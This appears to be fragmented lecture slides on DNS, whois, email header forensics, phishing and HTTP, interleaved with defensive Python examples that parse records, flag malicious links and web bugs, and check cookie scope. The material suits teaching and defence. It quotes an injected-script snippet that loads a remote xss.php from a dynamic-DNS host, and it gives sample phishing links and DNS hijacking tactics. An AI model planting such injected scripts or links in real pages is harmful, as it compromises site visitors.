requires its Internet Protocol address
◦ IPv4 - 66.228.49.238
◦ IPv6 - 2600:3c00::f03c:91ff:fedf:78db
• IANA gives blocks of IPs to Regional Internet Registries
◦ North America, South America, Asia-Pacific, Latin America, Africa
◦ RIRs give addresses to ISPs and hosting providers
• Early adopters have legacy allocations
◦ US Gov't / Military
◦ Universities
are reserved or in legacy space
Network Address Translation (NAT)
• Share one public IP with many machines
• Requires hardware and logic in software
CIDR notation
• 10.0.0.0/8 = all IP addresses beginning with 10
4 address
MX = Email server for domain
NS = Name server
Helpful to Have
AAAA = IP version 6 address
PTR = Pointer to domain for an IP address
SPF = Sender Policy for anti-spam
SRV = Pointer to any service
TXT = Arbitrary Text
mapping hardcoded?)
2. Check local cache (have we seen this mapping in the past few minutes?)
3. Ask preferred DNS server (does Verizon know this mapping?)
4. DNS Server goes up the food chain
   a. Asks root DNS server where to find '.com' NS
   b. Asks .com NS where to find 'banana.com' NS
   c. Asks banana.com NS where to find 'www'
   d. www.banana.com responds "authoritatively"
   e. DNS Server responds with 69.164.205.196
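The lookup order above (hosts file, local cache, then walking the delegation chain from the root down to the authoritative server) as an added example; this is not code from the slides. The hosts file, the zone data for the three name servers, and the 300-second cache TTL are all constructed in memory, so nothing is sent on the network.

```python
"""Toy resolver modelling the slide's lookup order: hosts file (step 1),
local cache (step 2), then iterative resolution root -> .com -> banana.com
(steps 3-4). All data below is constructed; no queries leave the process."""
import time

# Constructed hosts file: hardcoded mappings checked first (step 1)
HOSTS = {"localhost": "127.0.0.1"}

# Constructed zone data. Each server only knows its own delegations (NS)
# or final addresses (A); the names of the servers are assumptions.
ZONES = {
    "root":               {"com.": ("NS", "a.gtld-servers.net")},
    "a.gtld-servers.net": {"banana.com.": ("NS", "ns1.banana.com")},
    "ns1.banana.com":     {"www.banana.com.": ("A", "69.164.205.196")},
}

class Resolver:
    def __init__(self, ttl=300):
        self.cache = {}     # name -> (ip, expiry timestamp)
        self.ttl = ttl      # how long a cached answer is reused (step 2)
        self.trace = []     # which step produced each answer, for inspection

    def resolve(self, name, now=None):
        now = time.time() if now is None else now
        if name in HOSTS:                                    # step 1
            self.trace.append("hosts")
            return HOSTS[name]
        hit = self.cache.get(name)
        if hit and hit[1] > now:                             # step 2
            self.trace.append("cache")
            return hit[0]
        ip = self._iterate(name)                             # steps 3-4
        if ip:
            self.cache[name] = (ip, now + self.ttl)
        return ip

    def _iterate(self, name):
        """Start at the root and follow NS delegations until an authoritative
        server answers with an A record (steps 4a-4e)."""
        labels = name.rstrip(".").split(".")
        server = "root"
        # Ask for progressively longer suffixes: com. -> banana.com. -> www.banana.com.
        for i in range(len(labels) - 1, -1, -1):
            suffix = ".".join(labels[i:]) + "."
            rtype, value = ZONES[server].get(suffix, (None, None))
            self.trace.append(f"ask {server} for {suffix} -> {rtype} {value}")
            if rtype == "NS":
                server = value      # go one step down the food chain
            elif rtype == "A":
                return value        # authoritative answer
            else:
                return None         # no such name in this toy model
        return None

if __name__ == "__main__":
    r = Resolver()
    print(r.resolve("www.banana.com"), r.trace)
```

Run it twice for the same name inside the TTL and the second answer comes from the cache without re-walking the chain; a name the authoritative server does not know returns None.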
*nix
$ dig @ns1.google.com mail.google.com
;; ANSWER SECTION:
mail.google.com.         604800 IN CNAME googlemail.l.google.com.
googlemail.l.google.com. 300    IN A     74.125.228.86
googlemail.l.google.com. 300    IN A     74.125.228.85
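What a client has to do with the answer above, as an added example rather than code from the slides: parse dig's ANSWER SECTION into records, then follow the CNAME to the A records, taking the smallest TTL along the chain as the lifetime of the combined answer. The dig text is embedded as a constructed string, not a live query, and a CNAME loop or a dangling chain returns None instead of recursing forever.

```python
"""Parse dig's answer section and follow the CNAME chain to A records.
The dig output is a constructed copy of the slide's text."""
import re

DIG_OUTPUT = """\
;; ANSWER SECTION:
mail.google.com.         604800 IN CNAME googlemail.l.google.com.
googlemail.l.google.com. 300    IN A     74.125.228.86
googlemail.l.google.com. 300    IN A     74.125.228.85
"""

# name  ttl  IN  type  value
RR = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(\S+)$")

def parse_answer(text):
    """Return (name, ttl, type, value) tuples from the ANSWER SECTION only."""
    records, in_answer = [], False
    for line in text.splitlines():
        if line.startswith(";; ANSWER SECTION"):
            in_answer = True
            continue
        if line.startswith(";;"):          # any other section header ends it
            in_answer = False
        m = RR.match(line.strip())
        if in_answer and m:
            name, ttl, rtype, value = m.groups()
            records.append((name, int(ttl), rtype, value))
    return records

def resolve_a(records, name, max_hops=8):
    """Follow CNAMEs from `name`; return (final_name, [ips], effective_ttl).
    Effective TTL is the minimum over the chain, since any hop expiring
    invalidates the cached answer. Loops or dangling chains give None."""
    name = name.rstrip(".") + "."
    ttl = None
    for _ in range(max_hops):
        cnames = [r for r in records if r[0] == name and r[2] == "CNAME"]
        a_recs = [r for r in records if r[0] == name and r[2] == "A"]
        if a_recs:
            ttls = [r[1] for r in a_recs] + ([ttl] if ttl is not None else [])
            return name, [r[3] for r in a_recs], min(ttls)
        if not cnames:
            return None                    # chain points at nothing
        ttl = cnames[0][1] if ttl is None else min(ttl, cnames[0][1])
        name = cnames[0][3]
    return None                            # too many hops: treat as a loop

if __name__ == "__main__":
    print(resolve_a(parse_answer(DIG_OUTPUT), "mail.google.com"))
```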
nameservers
Requires guessing the Query ID
Typo-squatting (whitehouse.com)
Registering similar domains
Transferring DNS records
Social engineering the registrar
fake or protected
Stored with RIR or domain registrar
On *nix
$ whois 64.4.11.37 (from ARIN)
NetRange: 64.4.0.0 - 64.4.63.255
NetName: HOTMAIL
Address: One Microsoft Way
City: Redmond
Body: Text, Attachments
Mail Submission Agent (MSA)
• Listens on ports 587 and/or 25
• Accepts mail on behalf of users
Mail Transfer Agent (MTA)
• Looks up MX record of recipient
the latest transaction
Only trust your mailserver
Example: sending from office to home email
Received: by 10.4.18.32 (internal.google.com)
Received: from mail.yourcompany.biz by mail.google.com with ESMTP id <stuff>
    Sun, 10 May 2013 12:84:29 -0400 (EDT)
Issue: Malicious Links
• Display text differs from actual destination
  <a href="http://evil.ru/a.exe">Payment Notification </a>
Issue: Web Bugs
• Load invisible images to track receipt time and IP
  <img src="http://ad.shady.net/track.gif"
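A scanner for the two issues above, added here as an example and not taken from the slides: it walks an HTML mail body with the standard-library parser and reports (1) links whose visible text names a different host than the real href, or whose href ends in an executable extension, and (2) images that look like web bugs (loaded from a remote host and sized 0/1 pixel or hidden by style). The sample body, the extension list and the "1 pixel" heuristic are constructed assumptions.

```python
"""Flag display/destination mismatches and tracking images in an HTML mail body.
Sample body and heuristics are constructed for this example."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed list of extensions a mail link should never point at
EXECUTABLE_EXT = (".exe", ".scr", ".js", ".vbs", ".bat", ".hta")

class MailScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # (kind, detail) tuples
        self._href = None       # href of the <a> currently open
        self._text = []         # visible text collected inside it

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self._href, self._text = a.get("href", ""), []
        elif tag == "img":
            self._check_img(a)

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self._check_link(self._href, "".join(self._text).strip())
            self._href = None

    def _check_link(self, href, text):
        real = urlparse(href)
        host = real.hostname or ""
        if real.path.lower().endswith(EXECUTABLE_EXT):
            self.findings.append(("executable-link", href))
        # Only compare when the display text itself looks like a host or URL
        if " " in text or "." not in text:
            return
        shown = urlparse(text if "://" in text else "http://" + text).hostname or ""
        if shown != host:
            self.findings.append(("mismatched-link", f"{text} -> {host}"))

    def _check_img(self, a):
        src = a.get("src", "")
        style = a.get("style", "").replace(" ", "").lower()
        tiny = a.get("width", "") in ("0", "1") or a.get("height", "") in ("0", "1")
        hidden = "display:none" in style or "visibility:hidden" in style
        if urlparse(src).hostname and (tiny or hidden):
            self.findings.append(("web-bug", src))

def scan(html):
    s = MailScanner()
    s.feed(html)
    s.close()
    return s.findings

# Constructed sample reproducing both patterns from the slide
SAMPLE = """<p>Dear customer,</p>
<a href="http://evil.ru/a.exe">Payment Notification</a>
<a href="http://evil.ru/login">www.yourbank.com</a>
<a href="http://www.yourbank.com/help">www.yourbank.com</a>
<img src="http://ad.shady.net/track.gif" width="1" height="1">
<img src="http://www.yourbank.com/logo.png" width="200">"""

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE):
        print(kind, detail)
```

The third link and the second image are the benign controls: text and href agree, and a full-size logo is not reported.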
real sender
Forged headers
• Mis-matched sender name and IP address
  Received: from legit.gov (spammer.com [81.95.144.7]
• 'X-Spam-Filtered' lines added by spammer
Phishing
• Email from a compromised or spoofed sender with enticing theme and malicious contents
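The "only trust your mailserver" rule and the HELO/reverse-DNS mismatch above, applied together in an added example (not the slides' code): walk the Received: chain from the newest hop downward, stop at the first hop that was not added by one of your own servers (everything below it could have been forged by the sender), and report the connecting IP of that boundary hop plus any hop whose claimed name differs from the reverse DNS recorded by the receiving server. The header sample is constructed in the shape of the slide's examples, and the set of trusted servers is an assumption.

```python
"""Walk Received: headers newest-first, trusting only our own relays, and
flag HELO names that disagree with the reverse DNS the relay recorded.
Sample headers are constructed."""
import re
from email import message_from_string

# Assumption: the relays we operate (the "by" side of hops we trust)
TRUSTED = {"10.4.18.32", "mail.google.com"}

# Received: from <helo> (<rdns> [<ip>]) ... by <server> ...
RECV = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s\[\]()]+)?\s*\[(?P<ip>[0-9a-fA-F.:]+)\]\))?"
    r".*?\bby\s+(?P<by>\S+)", re.I | re.S)

def parse_received(raw):
    hops = []
    for value in message_from_string(raw).get_all("Received", []):  # newest first
        value = " ".join(value.split())          # unfold continuation lines
        m = RECV.search(value)
        if m:
            hops.append(m.groupdict())
        else:                                    # internal "by ..." hop without "from"
            by = re.search(r"\bby\s+(\S+)", value)
            hops.append({"helo": None, "rdns": None, "ip": None,
                         "by": by.group(1) if by else ""})
    return hops

def analyse(raw, trusted=TRUSTED):
    """Return (boundary_hop, findings). boundary_hop is the last hop added by
    a trusted relay, i.e. the first point where the mail entered our systems."""
    findings, origin = [], None
    for hop in parse_received(raw):
        if hop["by"].lower() not in trusted:
            break                                # below here the chain is hearsay
        origin = hop
        if hop["helo"] and hop["rdns"] and hop["helo"].lower() != hop["rdns"].lower():
            findings.append(f"HELO {hop['helo']} != rDNS {hop['rdns']} [{hop['ip']}]")
    return origin, findings

SAMPLE = """\
Received: by 10.4.18.32 (internal.google.com)
Received: from legit.gov (spammer.com [81.95.144.7])
        by mail.google.com with ESMTP id abc123;
        Sun, 10 May 2013 12:34:29 -0400 (EDT)
Received: from trusted.gov (trusted.gov [192.0.2.10])
        by legit.gov with ESMTP id def456
X-Spam-Filtered: yes
From: "Refunds" <refunds@legit.gov>
Subject: Refund

body
"""

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

The third Received: line and the X-Spam-Filtered: line were supplied by the sender, so the analysis ignores them; the boundary hop is the one recorded by mail.google.com, and its IP is what to look up with whois.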
bankofamericaportal.com
◦ hxxp://webmail.hbo.com.s-thrones.co[.]ru
• Dynamic DNS
◦ Hostnames are independent of each other since arbitrary people can request an entry
◦ Some providers allow client side software that will change the DNS entry based on the IP address of the client
◦ palderson.findme.com
◦ dol.ns01.us
◦ microsoft.ns01.us
h.src='http://dol.ns01.us:8081/web/xss.php';
◦ document.getElementsByTagName('head')[0].appendChild(h);
• Dynamically adds new javascript to the page
• No new files on infected web server
• Small modification to existing javascript
visiting site:
◦ Ctrl + U
◦ or via menu
• Directly view source without displaying page
◦ view-source:http://www.isightpartners.com/
• Source can reveal page creation software
◦ Meta-tags
◦ Comments
◦ Names within the elements (forms, javascript functions, etc)
◦ Directory names
copy for legal reasons
◦ Determine maliciousness
◦ Find vulnerabilities
◦ Read the page later
• Firefox - Save Web Page, complete
◦ Rearranges parts of the web page
• Internet Explorer - Save Webpage, complete
◦ Adds comments
• wget
• wget -p
are read from disk and delivered unchanged to the client
• Dynamic server
◦ Program or script is run that creates the content on-demand
◦ Database queries
◦ Remote retrieval
◦ Deliver content based on meta data of the client
▪ IP
▪ Referral Fields
▪ User-Agent
responsive
◦ Less bandwidth
◦ Lightens server load
◦ Not a substitute for server-side validation
• Server-side validation
◦ Generally more secure
◦ Doesn't expose data or logic to the client
great!
Extensible for any content
Widely supported and mature protocol
Persistent connections in HTTP 1.1
Also it has issues!
Must accept a wide range of inputs
Lack of session management
twitter.com! Please give me the resource at /NorthernlionLP. Also he's the best
Server: Cool, here's that page, and I ignored that 'best' GET variable, IDK what it means
http://twitter.com/NorthernlionLP?best=yes
and resource name
Host: Destination domain
Referer: Originating page for request
User-Agent: Client version and compatibility
Accept-Language: English, you speak it?

GET /highscores.html HTTP/1.1
Host: competitive-eating.biz
Referer: google.com/search/q?sandwiches
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0.1410.64 Safari/537.31
Accept-Language: en-us
URI
POST: Send data directly to site with same URI
PUT: Create a resource [usually ignored]
CONNECT: Get page on my behalf
Optional Client Headers
X-Forwarded-For: 73.5.1.2 (proxy logs)
DNT: 1 (please don't track me)
Full URI for page
Server: Server version and installed modules
Content-Type: MIME Format of the response
Last-Modified: Whether page should be refreshed from cache

HTTP/1.1 200 OK
Location: http://competitive-eating.biz/highscores.html
Server: Nginx/1.41
Content-Type: text/html
Last-Modified: Fri, 10 May 2013 02:01:13 GMT

<HTML>
<title>ALL TIME CHAMPIONS</title>
</HTML>
The Server's Response
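The request and response exchange above, taken apart by a small parser added here as an example (it is not code from the slides). It splits the request line into method, path, query string and version, treats header names case-insensitively as HTTP requires, drops query parameters the application does not know (the ignored "best" variable from the twitter.com dialogue), and refuses a malformed request line instead of guessing, which is the practical side of "must accept a wide range of inputs". The sample messages are constructed from the slide text; the set of known query parameters is an assumption.

```python
"""Minimal HTTP request/response parser for the messages shown on the slides.
Sample messages are constructed; KNOWN_QUERY_PARAMS is an assumption."""
from urllib.parse import urlsplit, parse_qs

KNOWN_QUERY_PARAMS = {"q", "page"}     # parameters the application understands

def _split_head(raw):
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    return head.split("\n"), body

def _parse_headers(lines, strict):
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            if strict:
                raise ValueError(f"malformed header: {line!r}")
            continue
        headers[name.strip().lower()] = value.strip()   # names are case-insensitive
    return headers

def parse_request(raw):
    lines, body = _split_head(raw)
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, version = parts
    url = urlsplit(target)
    query = parse_qs(url.query)
    return {
        "method": method, "path": url.path, "version": version,
        "headers": _parse_headers(lines[1:], strict=True),
        "query": {k: v for k, v in query.items() if k in KNOWN_QUERY_PARAMS},
        "ignored_params": sorted(k for k in query if k not in KNOWN_QUERY_PARAMS),
        "body": body,
    }

def parse_response(raw):
    lines, body = _split_head(raw)
    version, status, *reason = lines[0].split(" ")
    return {"version": version, "status": int(status), "reason": " ".join(reason),
            "headers": _parse_headers(lines[1:], strict=False), "body": body}

REQUEST = """GET /highscores.html?best=yes HTTP/1.1
Host: competitive-eating.biz
Referer: google.com/search/q?sandwiches
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0.1410.64 Safari/537.31
Accept-Language: en-us

"""

RESPONSE = """HTTP/1.1 200 OK
Location: http://competitive-eating.biz/highscores.html
Server: Nginx/1.41
Content-Type: text/html
Last-Modified: Fri, 10 May 2013 02:01:13 GMT

<HTML>
<title>ALL TIME CHAMPIONS</title>
</HTML>"""

if __name__ == "__main__":
    print(parse_request(REQUEST))
    print(parse_response(RESPONSE))
```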
Set using Set-Cookie or scripts
user=couch,scotch=macallan; expires=Sat,16-May-2013; path=/; domain=.amazon.com
i.e. this cookie denotes that I'm Couch and my purchase info. It can only be read by Amazon.
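Why "it can only be read by Amazon" holds, shown in an added example that is not from the slides: parse the Set-Cookie line above into its name/value and attributes, then apply the domain-matching rule a browser uses before sending a cookie (RFC 6265 section 5.1.3): the request host must equal the cookie's domain or be a subdomain of it, so amazon.com.evil.example never receives it. The function also honours Path and Secure, and treats a cookie without a Domain attribute as host-only. The second cookie and the host lookups are constructed.

```python
"""Parse Set-Cookie and decide which hosts a browser would send the cookie to.
The first cookie is the slide's example; the others are constructed."""

def parse_set_cookie(header):
    first, *attrs = [p.strip() for p in header.split(";")]
    name, _, value = first.partition("=")      # value may itself contain '='
    cookie = {"name": name.strip(), "value": value.strip(), "path": "/",
              "domain": None, "expires": None, "secure": False, "httponly": False}
    for attr in attrs:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "domain":
            cookie["domain"] = val.strip().lstrip(".").lower()   # leading dot is ignored
        elif key == "path":
            cookie["path"] = val.strip() or "/"
        elif key == "expires":
            cookie["expires"] = val.strip()
        elif key in ("secure", "httponly"):
            cookie[key] = True
    return cookie

def domain_matches(host, cookie_domain):
    """RFC 6265 domain-match: host equals the domain or ends with '.' + domain."""
    host = host.lower().rstrip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)

def will_send(cookie, host, set_by, path="/", https=True):
    """Would a browser attach `cookie` (set by host `set_by`) to a request
    for `path` on `host`?"""
    if cookie["secure"] and not https:
        return False
    if not path.startswith(cookie["path"]):
        return False
    if cookie["domain"] is None:                 # host-only cookie
        return host.lower() == set_by.lower()
    return domain_matches(host, cookie["domain"])

COOKIE = "user=couch,scotch=macallan; expires=Sat,16-May-2013; path=/; domain=.amazon.com"

if __name__ == "__main__":
    c = parse_set_cookie(COOKIE)
    for h in ("www.amazon.com", "amazon.com", "amazon.com.evil.example", "notamazon.com"):
        print(h, will_send(c, h, "www.amazon.com"))
```

Note that a Domain attribute widens the cookie to every subdomain, so a cookie scoped to .amazon.com is visible to any host under it; omitting Domain keeps it on the single host that set it.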